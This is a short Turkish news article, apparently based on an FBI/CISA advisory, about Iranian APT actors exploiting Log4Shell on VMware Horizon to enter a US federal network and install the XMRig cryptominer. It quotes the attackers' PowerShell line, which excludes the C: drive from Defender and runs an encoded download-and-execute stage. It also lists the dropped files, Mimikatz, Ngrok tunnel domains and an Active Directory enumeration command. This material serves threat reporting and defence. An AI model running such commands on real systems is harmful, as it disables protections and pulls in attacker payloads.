U.S. Federal Network Hacklendi

FBI ve CISA yaptığı açıklamada, İranlı APT gruplarının kripto para mandenciği yapmak için Federal Civilian Executive Branch (FCEB) ağına eriştiklerini açıkladı. Saldırganların XMRig kripto zararlısını dağıtmak için Log4Shell RCE zafiyetinden (CVE-2021-44228) yararlandıkları ortaya çıktı.

İranlı Apt grubunun VMware Horizon üzerindeki zafiyetleri kullanarak Federal Ağa eriştikleri ve orada kalıcı oldukları belirlendi.

Log4Shell zafiyetinden yararlandılar

Saldırganlar, Log4Shell güvenlik açığından yararlanarak XMRig kripto aracını kurdular ve ardından aşağıdaki işlemleri gerçekleştirler:

VMware sunucusuna, aşağıdaki IP adresinden HTTPS aracılığıyla erişildi:

Teknik Analiz

powershell try{Add-MpPreference -ExclusionPath ‘C:\’; Write-Host ‘added-exclusion’} catch {Write-Host ‘adding-exclusion-failed’ }; powershell -enc “$BASE64 encoded payload to download next stage and execute it”
WinRing0x64.sys
wuacltservice.exe
config.json
RuntimeBroker.exe
PsExec: A Microsoft signed tool for system administrators.

Mimikatz: A credential theft tool.

Ngrok: A reverse proxy tool for proxying an internal service out onto a Ngrok domain.
tunnel.us.ngrok[.]com

korgn.su.lennut[.]com

*.ngrok[.]com

*.ngrok[.]io

ngrok.*.tunnel[.]com

korgn.*.lennut[.]com
Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

Kullanılan taktik ve teknikler

Kaynak: gbhackers.com

Exit mobile version